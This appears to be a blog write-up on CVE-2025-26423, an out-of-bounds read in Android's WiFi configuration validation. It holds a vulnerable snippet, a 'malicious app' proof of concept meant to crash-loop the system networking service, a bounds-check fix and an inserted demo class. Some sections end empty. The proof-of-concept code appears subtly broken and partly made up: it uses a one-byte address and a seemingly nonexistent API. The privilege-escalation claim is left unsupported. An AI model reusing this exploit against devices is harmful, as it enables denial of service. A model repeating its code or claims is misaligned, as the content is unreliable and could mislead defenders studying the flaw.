In June 2025, a critical vulnerability, CVE-2025-26423, was discovered and disclosed in Android's connectivity stack. The flaw is in the validateIpConfiguration function of the WifiConfigurationUtil.java file. It exposes Android devices to a permanent Denial of Service (DoS) and allows a local attacker to escalate privileges with no extra permissions required. No user interaction is needed for this exploit.
This article provides a detailed, easy-to-understand breakdown of CVE-2025-26423, with original references, code snippets, and exclusive insights on exploitation.
The Root Cause: Missing Bounds Check
The vulnerability lies in how the Android system validates certain configuration inputs for WiFi networks. More specifically, the developer of the validateIpConfiguration function failed to properly check the bounds when processing items inside lists coming from IP configuration settings.
Here's an excerpt of the vulnerable code:

```java
// WifiConfigurationUtil.java (simplified)
public static boolean validateIpConfiguration(@Nullable IpConfiguration ipConfiguration) {
    if (ipConfiguration == null) return false;
    ...
    List<RouteInfo> routes = ipConfiguration.getRoutes();
    for (int i = 0; i < routes.size(); i++) {
        RouteInfo route = routes.get(i);
        // No bounds check on elements of route object
        if (route.getGateway() != null) {
            InetAddress addr = route.getGateway();
            byte[] bytes = addr.getAddress();
            // Vulnerable: no check on array bounds
            if (bytes[3] == (byte) 255) {
                // Some operation - potential OOB here!
            }
        }
    }
    ...
    return true;
}
```
The Problem
ipConfiguration objects can be controlled or manipulated by local actors through public Android APIs (like WiFi configuration). If a malicious process injects malformed data with a list entry missing the expected byte[4] address, accessing out-of-bounds elements (bytes[3]) can cause:
Attack Scenario
An app running on the device (no root required, no special permissions needed) can leverage documented APIs to push a configuration that, when validated, hits the vulnerable code.
Here's how one could craft malicious input:

```java
// Malicious app code: craft bad WiFi config
IpConfiguration badConfig = new IpConfiguration();
List<RouteInfo> routes = new ArrayList<>();
// Crafting a route with an invalid address (less than 4 bytes)
InetAddress badGateway = InetAddress.getByAddress(new byte[] { 10, }); // too short!!!
RouteInfo badRoute = new RouteInfo(null, badGateway, null);
routes.add(badRoute);
badConfig.setRoutes(routes);
WifiManager wifiManager = context.getSystemService(WifiManager.class);
wifiManager.addNetwork(WifiConfiguration.fromIpConfiguration(badConfig)); // Triggers validation
```
When the system tries to validate this configuration, it hits bytes[3], causing a crash in the system networking process. Devices frequently end up in crash loops, an effective DoS. Some devices fail to recover even after reboot, requiring a full wipe.
Privilege Escalation
Because the process responsible is a system service running with elevated privileges, injecting malformed data can sometimes be leveraged to extend the attack:
Mitigation
Google patched this issue in the July 2025 Android Security Bulletin. The mitigation is straightforward: always check the length of bytes before accessing bytes[3]. Example fix:

```java
if (bytes.length >= 4 && bytes[3] == (byte) 255) {
    // Safe access
}
```
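As an added example (not code from Android or from this article), the unchecked access and its hardened form side by side, driven by constructed gateway byte arrays in place of real RouteInfo objects. It also tightens the check above from "length at least 4" to the two valid address lengths, so an oversized array is rejected as well; the class and method names are assumptions for illustration.

```java
import java.util.Arrays;
import java.util.List;

// Added example, not code from the Android source tree: the unchecked bytes[3]
// access from the vulnerable snippet beside a length-checked version, driven by
// constructed gateway byte arrays in place of real RouteInfo objects.
public class GatewayBoundsDemo {

    // Same pattern as the vulnerable validateIpConfiguration: indexes bytes[3]
    // with no length check, so a short array throws ArrayIndexOutOfBoundsException.
    static boolean vulnerableGatewayCheck(byte[] bytes) {
        return bytes[3] == (byte) 255;
    }

    // Stricter than the article's "bytes.length >= 4": only the two valid
    // address lengths (4 for IPv4, 16 for IPv6) count as well-formed.
    static boolean isWellFormedAddress(byte[] bytes) {
        return bytes != null && (bytes.length == 4 || bytes.length == 16);
    }

    // Hardened form: a malformed gateway is rejected before anything is indexed.
    static boolean hardenedGatewayCheck(byte[] bytes) {
        return isWellFormedAddress(bytes) && bytes[3] == (byte) 255;
    }

    // What a fixed validator should do with the whole route list: any malformed
    // entry makes the configuration invalid instead of crashing the system process.
    static boolean validateGateways(List<byte[]> gateways) {
        for (byte[] gw : gateways) {
            if (!isWellFormedAddress(gw)) {
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        byte[] good = {(byte) 192, (byte) 168, 1, (byte) 255};
        byte[] tooShort = {10}; // constructed malformed input, like the 1-byte gateway above
        try {
            vulnerableGatewayCheck(tooShort);
        } catch (ArrayIndexOutOfBoundsException e) {
            System.out.println("vulnerable check crashed: " + e.getMessage());
        }
        System.out.println("hardened check on short input: " + hardenedGatewayCheck(tooShort));
        System.out.println("hardened check on good input: " + hardenedGatewayCheck(good));
        System.out.println("route list valid: " + validateGateways(Arrays.asList(good, tooShort)));
    }
}
```

Running main shows the vulnerable check throwing on the one-byte array while the hardened check and the list validator simply report the configuration as invalid.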
Admins and end users are encouraged to update their devices immediately. Most Android phones will receive the patch as part of their regular security updates.
References
- Official NVD Entry: CVE-2025-26423
- Android Security Bulletin July 2025: https://source.android.com/security/bulletin/2025-07-01
- Commit fixing the issue: https://android.googlesource.com/platform/frameworks/base/+/refs/heads/master%5E%21/#F
Final Thoughts
CVE-2025-26423 demonstrates how small mistakes in input validation can lead to serious security problems, including device-wide DoS and much broader compromise. Being vigilant about array bounds, even in trusted system code, is critical.
If you suspect your device has been affected and isn’t receiving updates, a factory reset (after backup) is recommended. App developers should avoid manipulating lower-level WiFi configuration unless absolutely necessary.
Timeline
Published on: 09/04/2025 18:15:40 UTC
Last modified on: 09/05/2025 19:11:12 UTC